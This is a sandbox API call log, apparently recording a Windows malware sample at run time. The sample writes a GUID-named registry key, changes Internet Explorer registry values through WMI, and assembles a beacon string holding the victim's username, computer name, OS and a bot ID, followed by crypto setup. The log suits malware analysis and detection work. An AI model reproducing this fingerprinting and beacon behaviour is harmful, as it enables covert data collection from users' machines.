lstrlenA (lpString="JunkJunk") returned 8 [0311.100] lstrcpyA (in: lpString1=0x2e6a175, lpString2="Active" | out: lpString1="Active") returned="Active" [0311.100] lstrcatA (in: lpString1="Active", lpString2="Mirrow" | out: lpString1="ActiveMirrow") returned="ActiveMirrow" [0311.100] lstrlenA (lpString="ActiveMirrow") returned 12 [0311.100] lstrcpyA (in: lpString1=0x2e6a182, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0311.100] lstrcatA (in: lpString1="Desktop", lpString2="Line" | out: lpString1="DesktopLine") returned="DesktopLine" [0311.100] lstrlenA (lpString="DesktopLine") returned 11 [0311.100] lstrcpyA (in: lpString1=0x2e6a18e, lpString2="Active" | out: lpString1="Active") returned="Active" [0311.100] lstrcatA (in: lpString1="Active", lpString2="Driver" | out: lpString1="ActiveDriver") returned="ActiveDriver" [0311.100] lstrlenA (lpString="ActiveDriver") returned 12 [0311.100] lstrcpyA (in: lpString1=0x2e6a19b, lpString2="Type" | out: lpString1="Type") returned="Type" [0311.100] lstrcatA (in: lpString1="Type", lpString2="Date" | out: lpString1="TypeDate") returned="TypeDate" [0311.100] lstrlenA (lpString="TypeDate") returned 8 [0311.100] lstrcpyA (in: lpString1=0x2e6a1a4, lpString2="Active" | out: lpString1="Active") returned="Active" [0311.100] lstrcatA (in: lpString1="Active", lpString2="Process" | out: lpString1="ActiveProcess") returned="ActiveProcess" [0311.100] lstrlenA (lpString="ActiveProcess") returned 13 [0311.101] lstrcpyA (in: lpString1=0x2e6a1b2, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0311.101] lstrcatA (in: lpString1="Desktop", lpString2="Make" | out: lpString1="DesktopMake") returned="DesktopMake" [0311.101] lstrlenA (lpString="DesktopMake") returned 11 [0311.101] lstrcpyA (in: lpString1=0x2e6a1be, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0311.101] lstrcatA (in: lpString1="Desktop", lpString2="Active" | out: lpString1="DesktopActive") returned="DesktopActive" [0311.101] lstrlenA (lpString="DesktopActive") returned 13 [0311.101] lstrcpyA (in: lpString1=0x2e6a1cc, lpString2="Line" | out: lpString1="Line") returned="Line" [0311.101] lstrcatA (in: lpString1="Line", lpString2="Reply" | out: lpString1="LineReply") returned="LineReply" [0311.101] lstrlenA (lpString="LineReply") returned 9 [0311.101] lstrcpyA (in: lpString1=0x2e6a1d6, lpString2="Collect" | out: lpString1="Collect") returned="Collect" [0311.101] lstrcatA (in: lpString1="Collect", lpString2="Black" | out: lpString1="CollectBlack") returned="CollectBlack" [0311.101] lstrlenA (lpString="CollectBlack") returned 12 [0311.101] lstrcpyA (in: lpString1=0x2e6a1e3, lpString2="Device" | out: lpString1="Device") returned="Device" [0311.101] lstrcatA (in: lpString1="Device", lpString2="Control" | out: lpString1="DeviceControl") returned="DeviceControl" [0311.101] lstrlenA (lpString="DeviceControl") returned 13 [0311.101] lstrcpyA (in: lpString1=0x2e6a1f1, lpString2="Paper" | out: lpString1="Paper") returned="Paper" [0311.101] lstrcatA (in: lpString1="Paper", lpString2="Local" | out: lpString1="PaperLocal") returned="PaperLocal" [0311.101] lstrlenA (lpString="PaperLocal") returned 10 [0311.101] lstrcpyA (in: lpString1=0x2e6a1fc, lpString2="Paper" | out: lpString1="Paper") returned="Paper" [0311.101] lstrcatA (in: lpString1="Paper", lpString2="List" | out: lpString1="PaperList") returned="PaperList" [0311.101] lstrlenA (lpString="PaperList") returned 9 [0311.101] lstrcpyA (in: lpString1=0x2e6a206, lpString2="White" | out: lpString1="White") returned="White" [0311.102] lstrcatA (in: lpString1="White", lpString2="Stop" | out: lpString1="WhiteStop") returned="WhiteStop" [0311.102] lstrlenA (lpString="WhiteStop") returned 9 [0311.102] lstrcpyA (in: lpString1=0x2e6a210, lpString2="Tool" | out: lpString1="Tool") returned="Tool" [0311.102] lstrcatA (in: lpString1="Tool", lpString2="Name" | out: lpString1="ToolName") returned="ToolName" [0311.102] lstrlenA (lpString="ToolName") returned 8 [0311.102] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e69c40 | out: hHeap=0x2a70000) returned 1 [0311.102] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e697e8 | out: hHeap=0x2a70000) returned 1 [0311.102] lstrlenA (lpString="PackMouse") returned 9 [0311.102] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x14) returned 0x2e69c40 [0311.103] mbstowcs (in: _Dest=0x2e69c40, _Source="PackMouse", _MaxCount=0xa | out: _Dest="PackMouse") returned 0x9 [0311.103] lstrlenA (lpString="ComputerReply") returned 13 [0311.103] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x1c) returned 0x2e69c60 [0311.103] mbstowcs (in: _Dest=0x2e69c60, _Source="ComputerReply", _MaxCount=0xe | out: _Dest="ComputerReply") returned 0xd [0311.103] lstrlenA (lpString="MouseTool") returned 9 [0311.103] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x14) returned 0x2e69c88 [0311.103] mbstowcs (in: _Dest=0x2e69c88, _Source="MouseTool", _MaxCount=0xa | out: _Dest="MouseTool") returned 0x9 [0311.103] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x27) returned 0x2e69ca8 [0311.103] wsprintfA (in: param_1=0x2e69ca8, param_2="%08X-%04X-%04X-%04X-%08X%04X" | out: param_1="328B31DC-E9F0-3405-0386-2DA8E71AB15C") returned 36 [0311.103] lstrlenA (lpString="Software\\AppDataLow\\Software\\Microsoft\\") returned 39 [0311.103] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x4e) returned 0x2e69cd8 [0311.103] lstrcpyA (in: lpString1=0x2e69cd8, lpString2="Software\\AppDataLow\\Software\\Microsoft\\" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\") returned="Software\\AppDataLow\\Software\\Microsoft\\" [0311.103] lstrcatA (in: lpString1="Software\\AppDataLow\\Software\\Microsoft\\", lpString2="328B31DC-E9F0-3405-0386-2DA8E71AB15C" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\328B31DC-E9F0-3405-0386-2DA8E71AB15C") returned="Software\\AppDataLow\\Software\\Microsoft\\328B31DC-E9F0-3405-0386-2DA8E71AB15C" [0311.104] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e69ca8 | out: hHeap=0x2a70000) returned 1 [0311.104] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x27) returned 0x2e69ca8 [0311.104] wsprintfA (in: param_1=0x2e69ca8, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{0B2F673E-EEB8-752B-506F-0279841356BD}") returned 38 [0311.104] lstrlenA (lpString="Local\\") returned 6 [0311.104] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x2d) returned 0x2e69d30 [0311.104] lstrcpyA (in: lpString1=0x2e69d30, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0311.104] lstrcatA (in: lpString1="Local\\", lpString2="{0B2F673E-EEB8-752B-506F-0279841356BD}" | out: lpString1="Local\\{0B2F673E-EEB8-752B-506F-0279841356BD}") returned="Local\\{0B2F673E-EEB8-752B-506F-0279841356BD}" [0311.104] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e69ca8 | out: hHeap=0x2a70000) returned 1 [0311.104] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x23 [0311.104] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x46) returned 0x2e69d68 [0311.104] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x2e69d68, nSize=0x23 | out: lpDst="C:\\Users\\OqXZRaykm\\AppData\\Roaming") returned 0x23 [0311.104] lstrlenW (lpString="C:\\Users\\OqXZRaykm\\AppData\\Roaming") returned 34 [0311.104] GetProcAddress (hModule=0x76410000, lpProcName="StrCmpNIW") returned 0x7642ad00 [0311.104] StrCmpNIW (lpStr1="C:\\Users\\OqXZRaykm\\AppData\\Roaming", lpStr2="C:\\Users\\OqXZRaykm\\Desktop\\a6886a3", nChar=34) returned -1 [0311.105] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e69d68 | out: hHeap=0x2a70000) returned 1 [0311.105] CreateWaitableTimerA (lpTimerAttributes=0x0, bManualReset=1, lpTimerName=0x0) returned 0x21c [0311.105] SetWaitableTimer (hTimer=0x21c, lpDueTime=0x8bf890, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0311.105] WaitForMultipleObjects (nCount=0x2, lpHandles=0x8bf898*=0x21c, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0312.091] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x8) returned 0x2e69ca8 [0312.092] GetProcAddress (hModule=0x775f0000, lpProcName="CoCreateInstance") returned 0x7652dbf0 [0312.092] CoCreateInstance (in: rclsid=0x2e686ac*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x2e686bc*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8bf818 | out: ppv=0x8bf818*=0x602f70) returned 0x0 [0312.531] WbemLocator:IWbemLocator:ConnectServer (This=0x602f70, strNetworkResource="root\\default", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x8bf820) [0312.531] WbemLocator:IWbemLocator:ConnectServer (in: This=0x602f70, strNetworkResource="root\\default", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x8bf820 | out: ppNamespace=0x8bf820*=0x624c40) returned 0x0 [0315.324] GetProcAddress (hModule=0x775f0000, lpProcName="CoSetProxyBlanket") returned 0x76596610 [0315.324] CoSetProxyBlanket (pProxy=0x624c40, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0315.324] WbemLocator:IUnknown:Release (This=0x602f70) returned 0x0 [0315.325] IWbemServices:GetObject (in: This=0x624c40, strObjectPath="StdRegProv", lFlags=0, pCtx=0x0, ppObject=0x2e69cac*=0x2a700c0, ppCallResult=0x0 | out: ppObject=0x2e69cac*=0x6419d8, ppCallResult=0x0) returned 0x0 [0315.427] IWbemClassObject:GetMethod (in: This=0x6419d8, wszName="GetStringValue", lFlags=0, ppInSignature=0x8bf7e0, ppOutSignature=0x0 | out: ppInSignature=0x8bf7e0*=0x64bb88, ppOutSignature=0x0) returned 0x0 [0315.427] IWbemClassObject:Put (This=0x64bb88, wszName="hDefKey", lFlags=0, pVal=0x8bf798*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x80000002, varVal2=0x0), Type=0) returned 0x0 [0315.430] IWbemClassObject:Put (This=0x64bb88, wszName="sSubKeyName", lFlags=0, pVal=0x8bf798*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SOFTWARE\\Microsoft\\Internet Explorer\\", varVal2=0x0), Type=0) returned 0x0 [0315.431] IWbemClassObject:Put (This=0x64bb88, wszName="sValueName", lFlags=0, pVal=0x8bf798*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Version", varVal2=0x0), Type=0) returned 0x0 [0315.432] IWbemServices:ExecMethod (in: This=0x624c40, strObjectPath="StdRegProv", strMethodName="GetStringValue", lFlags=0, pCtx=0x0, pInParams=0x64bb88, ppOutParams=0x8bf7ec*=0x0, ppCallResult=0x0 | out: ppOutParams=0x8bf7ec*=0x64c2e8, ppCallResult=0x0) returned 0x0 [0316.558] IWbemClassObject:Get (in: This=0x64c2e8, wszName="ReturnValue", lFlags=0, pVal=0x8bf7b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x8bf7b8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0316.559] IWbemClassObject:Get (in: This=0x64c2e8, wszName="sValue", lFlags=0, pVal=0x8bf810*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x8bf810*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9.11.19041.0", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0316.559] IUnknown:Release (This=0x64c2e8) returned 0x0 [0316.559] IUnknown:Release (This=0x64bb88) returned 0x0 [0316.561] lstrlenW (lpString="9.11.19041.0") returned 12 [0316.561] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x1a) returned 0x2e69d68 [0316.561] memcpy (in: _Dst=0x2e69d68, _Src=0x640f74, _Size=0x18 | out: _Dst=0x2e69d68) returned 0x2e69d68 [0316.561] GetProcAddress (hModule=0x76410000, lpProcName="StrToIntExW") returned 0x7642b020 [0316.562] StrToIntExW (pszString="9.11.19041.0", dwFlags=0x0, piRet=0x8bf860) [0316.562] StrToIntExW (in: pszString="9.11.19041.0", dwFlags=0x0, piRet=0x8bf860 | out: piRet=0x8bf860) returned 1 [0316.562] lstrlenW (lpString="SOFTWARE\\Microsoft\\Internet Explorer\\") returned 37 [0316.562] lstrlenW (lpString="Main") returned 4 [0316.562] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x54) returned 0x2e69d90 [0316.562] memcpy (in: _Dst=0x2e69d90, _Src=0x2e69118, _Size=0x4a | out: _Dst=0x2e69d90) returned 0x2e69d90 [0316.562] memcpy (in: _Dst=0x2e69dda, _Src=0x2e69280, _Size=0xa | out: _Dst=0x2e69dda) returned 0x2e69dda [0316.562] lstrlenA (lpString="IE10RunOnceLastShown_TIMESTAMP") returned 30 [0316.562] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x3e) returned 0x2e697e8 [0316.562] mbstowcs (in: _Dest=0x2e697e8, _Source="IE10RunOnceLastShown_TIMESTAMP", _MaxCount=0x1f | out: _Dest="IE10RunOnceLastShown_TIMESTAMP") returned 0x1e [0316.562] IWbemClassObject:GetMethod (in: This=0x6419d8, wszName="SetDWORDValue", lFlags=0, ppInSignature=0x8bf7b0, ppOutSignature=0x0 | out: ppInSignature=0x8bf7b0*=0x64bcf8, ppOutSignature=0x0) returned 0x0 [0316.562] IWbemClassObject:Put (This=0x64bcf8, wszName="hDefKey", lFlags=0, pVal=0x8bf768*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x80000001, varVal2=0x0), Type=0) returned 0x0 [0316.562] IWbemClassObject:Put (This=0x64bcf8, wszName="sSubKeyName", lFlags=0, pVal=0x8bf768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SOFTWARE\\Microsoft\\Internet Explorer\\Main", varVal2=0x0), Type=0) returned 0x0 [0316.563] IWbemClassObject:Put (This=0x64bcf8, wszName="sValueName", lFlags=0, pVal=0x8bf768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="IE10RunOnceLastShown", varVal2=0x0), Type=0) returned 0x0 [0316.563] IWbemClassObject:Put (This=0x64bcf8, wszName="uValue", lFlags=0, pVal=0x8bf7e0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), Type=0) returned 0x0 [0316.563] IWbemServices:ExecMethod (in: This=0x624c40, strObjectPath="StdRegProv", strMethodName="SetDWORDValue", lFlags=0, pCtx=0x0, pInParams=0x64bcf8, ppOutParams=0x8bf7bc*=0x0, ppCallResult=0x0 | out: ppOutParams=0x8bf7bc*=0x64b8d0, ppCallResult=0x0) returned 0x0 [0316.622] IWbemClassObject:Get (in: This=0x64b8d0, wszName="ReturnValue", lFlags=0, pVal=0x8bf788*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x8bf788*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0316.622] IUnknown:Release (This=0x64b8d0) returned 0x0 [0316.622] IUnknown:Release (This=0x64bcf8) returned 0x0 [0316.622] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bf830 | out: lpSystemTimeAsFileTime=0x8bf830*(dwLowDateTime=0xaa2df0c7, dwHighDateTime=0x1d95b24)) [0316.623] IWbemClassObject:GetMethod (in: This=0x6419d8, wszName="SetBinaryValue", lFlags=0, ppInSignature=0x8bf798, ppOutSignature=0x0 | out: ppInSignature=0x8bf798*=0x64bcf8, ppOutSignature=0x0) returned 0x0 [0316.623] IWbemClassObject:Put (This=0x64bcf8, wszName="hDefKey", lFlags=0, pVal=0x8bf750*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x80000001, varVal2=0x0), Type=0) returned 0x0 [0316.623] IWbemClassObject:Put (This=0x64bcf8, wszName="sSubKeyName", lFlags=0, pVal=0x8bf750*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SOFTWARE\\Microsoft\\Internet Explorer\\Main", varVal2=0x0), Type=0) returned 0x0 [0316.623] IWbemClassObject:Put (This=0x64bcf8, wszName="sValueName", lFlags=0, pVal=0x8bf750*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="IE10RunOnceLastShown_TIMESTAMP", varVal2=0x0), Type=0) returned 0x0 [0316.623] IWbemClassObject:Put (This=0x64bcf8, wszName="uValue", lFlags=0, pVal=0x8bf7c8*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x63bb78*(cDims=0x1, fFeatures=0x80, cbElements=0x1, cLocks=0x0, pvData=0x62b420*, rgsabound=((cElements=0x8, lLbound=0))), varVal2=0x0), Type=0) returned 0x0 [0316.630] IWbemServices:ExecMethod (in: This=0x624c40, strObjectPath="StdRegProv", strMethodName="SetBinaryValue", lFlags=0, pCtx=0x0, pInParams=0x64bcf8, ppOutParams=0x8bf7a4*=0x0, ppCallResult=0x0 | out: ppOutParams=0x8bf7a4*=0x64b8d0, ppCallResult=0x0) returned 0x0 [0316.734] IWbemClassObject:Get (in: This=0x64b8d0, wszName="ReturnValue", lFlags=0, pVal=0x8bf770*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x8bf770*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0316.734] IUnknown:Release (This=0x64b8d0) returned 0x0 [0316.734] IUnknown:Release (This=0x64bcf8) returned 0x0 [0316.735] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e697e8 | out: hHeap=0x2a70000) returned 1 [0316.735] IWbemClassObject:GetMethod (in: This=0x6419d8, wszName="SetStringValue", lFlags=0, ppInSignature=0x8bf7d0, ppOutSignature=0x0 | out: ppInSignature=0x8bf7d0*=0x64bcf8, ppOutSignature=0x0) returned 0x0 [0316.735] IWbemClassObject:Put (This=0x64bcf8, wszName="hDefKey", lFlags=0, pVal=0x8bf788*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x80000001, varVal2=0x0), Type=0) returned 0x0 [0316.735] IWbemClassObject:Put (This=0x64bcf8, wszName="sSubKeyName", lFlags=0, pVal=0x8bf788*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SOFTWARE\\Microsoft\\Internet Explorer\\Main", varVal2=0x0), Type=0) returned 0x0 [0316.735] IWbemClassObject:Put (This=0x64bcf8, wszName="sValueName", lFlags=0, pVal=0x8bf788*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Check_Associations", varVal2=0x0), Type=0) returned 0x0 [0316.735] IWbemClassObject:Put (This=0x64bcf8, wszName="sValue", lFlags=0, pVal=0x8bf800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="no", varVal2=0x0), Type=0) returned 0x0 [0316.735] IWbemServices:ExecMethod (in: This=0x624c40, strObjectPath="StdRegProv", strMethodName="SetStringValue", lFlags=0, pCtx=0x0, pInParams=0x64bcf8, ppOutParams=0x8bf7dc*=0x0, ppCallResult=0x0 | out: ppOutParams=0x8bf7dc*=0x64b8d0, ppCallResult=0x0) returned 0x0 [0316.788] IWbemClassObject:Get (in: This=0x64b8d0, wszName="ReturnValue", lFlags=0, pVal=0x8bf7a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x8bf7a8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0316.788] IUnknown:Release (This=0x64b8d0) returned 0x0 [0316.788] IUnknown:Release (This=0x64bcf8) returned 0x0 [0316.789] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e69d90 | out: hHeap=0x2a70000) returned 1 [0316.789] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e69d68 | out: hHeap=0x2a70000) returned 1 [0316.789] IUnknown:Release (This=0x6419d8) returned 0x0 [0316.789] WbemLocator:IUnknown:Release (This=0x624c40) returned 0x0 [0316.796] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e69ca8 | out: hHeap=0x2a70000) returned 1 [0316.796] wsprintfA (param_1=0x8bf82c, param_2="size=%u&hash=0x%08x") [0316.796] wsprintfA (in: param_1=0x8bf82c, param_2="size=%u&hash=0x%08x" | out: param_1="size=0&hash=0x00000000") returned 22 [0316.796] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x800) returned 0x2e6a410 [0316.796] wsprintfA (in: param_1=0x2e6a410, param_2="soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x" | out: param_1="soft=2&version=250255&user=d2aa35fb613f006503862da8daba5ab7&server=50&id=7715&crc=1") returned 83 [0316.796] QueryPerformanceFrequency (lpFrequency=0x8bf7e0) [0316.796] QueryPerformanceFrequency (in: lpFrequency=0x8bf7e0 | out: lpFrequency=0x8bf7e0*=100000000) returned 1 [0316.796] QueryPerformanceCounter (in: lpPerformanceCount=0x8bf7d8 | out: lpPerformanceCount=0x8bf7d8*=3214069470088) returned 1 [0316.796] wsprintfA (in: param_1=0x2e6a463, param_2="&uptime=%u" | out: param_1="&uptime=32140") returned 13 [0316.796] wsprintfA (in: param_1=0x2e6a470, param_2="&%s" | out: param_1="&size=0&hash=0x00000000") returned 23 [0316.796] wsprintfA (in: param_1=0x2e6a487, param_2="&action=%08x" | out: param_1="&action=00000000") returned 16 [0316.796] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x0, nSize=0x8bf7e4 | out: lpBuffer=0x0, nSize=0x8bf7e4) returned 0 [0316.797] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0xc) returned 0x2e69ca8 [0316.797] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x2e69ca8, nSize=0x8bf7e4 | out: lpBuffer="pXTHffRyO7", nSize=0x8bf7e4) returned 1 [0316.798] wsprintfA (in: param_1=0x2e6a497, param_2="&dns=%s" | out: param_1="&dns=pXTHffRyO7") returned 15 [0316.798] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e69ca8 | out: hHeap=0x2a70000) returned 1 [0316.800] GetUserNameW (in: lpBuffer=0x0, pcbBuffer=0x8bf7e4 | out: lpBuffer=0x0, pcbBuffer=0x8bf7e4) returned 0 [0316.800] GetComputerNameW (in: lpBuffer=0x0, nSize=0x8bf7e4 | out: lpBuffer=0x0, nSize=0x8bf7e4) returned 0 [0316.801] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x5c) returned 0x2e69d68 [0316.801] GetUserNameW (in: lpBuffer=0x2e69d96, pcbBuffer=0x8bf7e4 | out: lpBuffer="OqXZRaykm", pcbBuffer=0x8bf7e4) returned 1 [0316.801] GetComputerNameW (in: lpBuffer=0x2e69daa, nSize=0x8bf7e0 | out: lpBuffer="PXTHFFRYO7", nSize=0x8bf7e0) returned 1 [0316.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OqXZRaykm@PXTHFFRYO7", cchWideChar=20, lpMultiByteStr=0x2e69d68, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OqXZRaykm@PXTHFFRYO7.", lpUsedDefaultChar=0x0) returned 20 [0316.801] wsprintfA (in: param_1=0x2e6a4a6, param_2="&whoami=%s" | out: param_1="&whoami=OqXZRaykm@PXTHFFRYO7") returned 28 [0316.801] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e69d68 | out: hHeap=0x2a70000) returned 1 [0316.802] lstrlenA (lpString="checklist.skype.com") returned 19 [0316.802] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x14) returned 0x2e69ca8 [0316.802] memcpy (in: _Dst=0x2e69ca8, _Src=0x2e69b98, _Size=0x13 | out: _Dst=0x2e69ca8) returned 0x2e69ca8 [0316.802] wsprintfA (in: param_1=0x2e6a4c2, param_2="&os=%s" | out: param_1="&os=10.0_0_0_x64") returned 16 [0316.802] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x800) returned 0x2e6ac18 [0316.802] GetTickCount () returned 0x1e80ff8 [0316.802] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x4) returned 0x2e69cc8 [0316.802] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x8) returned 0x2e69d68 [0316.802] lstrlenA (lpString="%s=%s&") returned 6 [0316.802] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x11) returned 0x2e69d78 [0316.802] sprintf (_Dest=0x2e69d78, _Format="%s=%s&") [0316.802] sprintf (in: _Dest=0x2e69d78, _Format="%s=%s&" | out: _Dest="yunqiil=ali&") returned 12 [0316.802] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e69d68 | out: hHeap=0x2a70000) returned 1 [0316.802] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e69cc8 | out: hHeap=0x2a70000) returned 1 [0316.802] lstrlenA (lpString="yunqiil=ali&") returned 12 [0316.802] lstrlenA (lpString="soft=2&version=250255&user=d2aa35fb613f006503862da8daba5ab7&server=50&id=7715&crc=1&uptime=32140&size=0&hash=0x00000000&action=00000000&dns=pXTHffRyO7&whoami=OqXZRaykm@PXTHFFRYO7&os=10.0_0_0_x64") returned 194 [0316.802] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0xcf) returned 0x2e697e8 [0316.802] strcpy (in: _Dest=0x2e697e8, _Source="yunqiil=ali&" | out: _Dest="yunqiil=ali&") returned="yunqiil=ali&" [0316.802] lstrcatA (in: lpString1="yunqiil=ali&", lpString2="soft=2&version=250255&user=d2aa35fb613f006503862da8daba5ab7&server=50&id=7715&crc=1&uptime=32140&size=0&hash=0x00000000&action=00000000&dns=pXTHffRyO7&whoami=OqXZRaykm@PXTHFFRYO7&os=10.0_0_0_x64" | out: lpString1="yunqiil=ali&soft=2&version=250255&user=d2aa35fb613f006503862da8daba5ab7&server=50&id=7715&crc=1&uptime=32140&size=0&hash=0x00000000&action=00000000&dns=pXTHffRyO7&whoami=OqXZRaykm@PXTHFFRYO7&os=10.0_0_0_x64") returned="yunqiil=ali&soft=2&version=250255&user=d2aa35fb613f006503862da8daba5ab7&server=50&id=7715&crc=1&uptime=32140&size=0&hash=0x00000000&action=00000000&dns=pXTHffRyO7&whoami=OqXZRaykm@PXTHFFRYO7&os=10.0_0_0_x64" [0316.802] lstrlenA (lpString="yunqiil=ali&soft=2&version=250255&user=d2aa35fb613f006503862da8daba5ab7&server=50&id=7715&crc=1&uptime=32140&size=0&hash=0x00000000&action=00000000&dns=pXTHffRyO7&whoami=OqXZRaykm@PXTHFFRYO7&os=10.0_0_0_x64") returned 206 [0316.803] GetProcAddress (hModule=0x76390000, lpProcName="CryptAcquireContextW") returned 0x763ae850 [0316.803] CryptAcquireContextW (in: phProv=0x8bf78c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8bf78c*=0x6440a8) returned 1 [0316.843] memcpy (in: _Dst=0x8bf76c, _Src=0x2e69b78, _Size=0x10 | out: _Dst=0x8bf76c) returned 0x8bf76c 